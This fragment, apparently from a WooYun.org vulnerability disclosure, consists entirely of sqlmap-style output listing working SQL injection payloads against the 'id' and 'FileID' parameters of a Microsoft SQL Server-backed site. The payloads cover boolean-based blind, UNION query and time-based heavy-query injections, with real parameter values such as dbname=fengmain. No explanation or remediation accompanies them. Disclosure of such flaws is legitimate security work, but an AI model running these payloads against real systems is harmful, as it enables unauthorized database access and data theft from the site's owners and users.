WooYun.org

Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=447 AND 1204=1204&mid=132&dbname=fengmain
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=-1089 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(113)+CHAR(121)+CHAR(111)+CHAR(113)+CHAR(116)+CHAR(79)+CH
AR(66)+CHAR(113)+CHAR(100)+CHAR(113)+CHAR(66)+CHAR(97)+CHAR(117)+CHAR(100)+CHAR(113)+CHAR(116)+CHAR(112)+CHAR(101)+CHAR(
113),NULL,NULL,NULL-- &mid=132&dbname=fengmain
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: id=447 AND 3287=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,s
ysusers AS sys5,sysusers AS sys6,sysusers AS sys7)&mid=132&dbname=fengmain

Place: GET
Parameter: FileID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: FileID=21696 AND 7547=7547
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: FileID=21696 AND 1236=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS
sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)